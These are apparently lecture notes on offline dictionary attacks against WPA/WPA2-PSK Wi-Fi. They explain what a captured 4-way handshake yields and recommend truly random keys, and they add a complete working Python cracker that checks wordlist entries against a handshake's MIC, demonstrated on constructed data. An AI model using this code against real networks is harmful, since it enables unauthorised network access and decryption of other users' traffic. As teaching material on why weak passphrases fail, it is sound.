WPA PSK attacks

  • A PSK derived from a passphrase of less than about 20 characters (or any passphrase that appears in a wordlist) is likely to be vulnerable to an offline dictionary attack

  • To perform the attack it is necessary to sniff, from the initial 4-way handshake, the two MAC addresses (authenticator and supplicant), both nonces (ANonce and SNonce), the selected cipher suite (which determines the MIC algorithm) and one MIC-protected EAPOL-Key message to test candidates against; the SSID, which is the PBKDF2 salt, is taken from beacons or probe responses

  • Since a single PSK is shared by the whole ESS, an attacker who recovers it can join the ESS as a legitimate station and can also derive any other station's PTK from that station's captured handshake and decrypt its traffic, so the whole ESS is compromised

  • WPA PSK should use only truly random keys (a random 256-bit PSK entered as 64 hex digits, or a long random passphrase): a dictionary attack succeeds only if the passphrase is in the wordlist

  • Attack tools: coWPAtty and Aircrack-ng

  • For a dictionary attack, each candidate passphrase must be run through PBKDF2 (4096 iterations of HMAC-SHA1, salted with the SSID) to obtain a candidate PMK; the PMK, the two nonce values and the supplicant and authenticator MAC addresses are then expanded into the PTK, whose KCK is used to recompute the MIC of the captured handshake message and compare it with the captured one. This is slow (approximately 70 words/second on a Pentium 4 3.8 GHz system), but since the salt is only the SSID, PMK tables can be precomputed per common SSID (coWPAtty's genpmk) and GPU-based crackers are orders of magnitude faster, so the cost of PBKDF2 is not a defence against a weak passphrase
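The following is an added example, not code from the original slides or from coWPAtty/Aircrack-ng, showing the whole offline check described above in working Python: PBKDF2 to the PMK, the 802.11 PRF-512 to the PTK, and the EAPOL-Key MIC (HMAC-MD5 for TKIP, HMAC-SHA1-128 for CCMP) recomputed with the KCK for each wordlist entry. The handshake it attacks is constructed inline under a known passphrase (SSID "TestNet", made-up MAC addresses and nonces, an EAPOL-Key message 2 with an empty Key Data field); it is not a real capture, and a practitioner would replace `sample_capture()` with values parsed from a pcap.

```python
"""Offline WPA/WPA2-PSK dictionary attack against a captured 4-way handshake (added example)."""
import hashlib
import hmac
import struct

# Offsets inside an EAPOL-Key frame: 4-byte 802.1X header, then the RSN key descriptor
# (type 1, key info 2, key length 2, replay counter 8, nonce 32, IV 16, RSC 8, ID 8) -> MIC at 81
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with the MIC field zeroed; algorithm from the descriptor version bits."""
    version = struct.unpack(">H", eapol_frame[5:7])[0] & 0x7      # low 3 bits of Key Information
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    if version == 1:                                               # TKIP: HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                                               # CCMP: HMAC-SHA1 truncated to 128 bits
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % version)


def crack_handshake(cap: dict, wordlist):
    """Return the first wordlist entry whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = cap["eapol_msg2"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, cap["ssid"])
        kck = ptk_from_pmk(pmk, cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, cap["eapol_msg2"]), captured_mic):
            return candidate
    return None


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN, key_data: bytes = b"") -> bytes:
    """Assemble a minimal EAPOL-Key message 2 (RSN descriptor, version 2, pairwise, MIC bit set)."""
    key_info = 0x010A                                     # version 2 | pairwise | MIC present
    body = (bytes([2])                                    # descriptor type: RSN
            + struct.pack(">HH", key_info, 16)            # key info, key length (CCMP)
            + struct.pack(">Q", 1)                        # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + mic + struct.pack(">H", len(key_data)) + key_data)
    return bytes([2, 3]) + struct.pack(">H", len(body)) + body    # 802.1X v2, type EAPOL-Key


def sample_capture(passphrase: str = "butterfly2009") -> dict:
    """Constructed handshake (not a real trace): message 2 MIC'd under a known passphrase."""
    ssid = b"TestNet"                                     # assumed network name
    aa = bytes.fromhex("001122334455")                    # made-up authenticator MAC
    spa = bytes.fromhex("66778899aabb")                   # made-up supplicant MAC
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    unsigned = build_eapol_msg2(snonce)
    signed = unsigned[:MIC_OFFSET] + eapol_mic(kck, unsigned) + unsigned[MIC_OFFSET + MIC_LEN:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol_msg2": signed}


WORDLIST = ["password", "qwertyuiop", "butterfly2009", "letmein1"]   # constructed toy wordlist

if __name__ == "__main__":
    print("recovered passphrase:", crack_handshake(sample_capture(), WORDLIST))
```

The PBKDF2 step dominates: a 256-bit PMK needs two PBKDF2 blocks, so each candidate costs about 8192 HMAC-SHA1 computations before the cheap PRF and MIC steps, which is why precomputing PMKs per SSID pays off for an attacker.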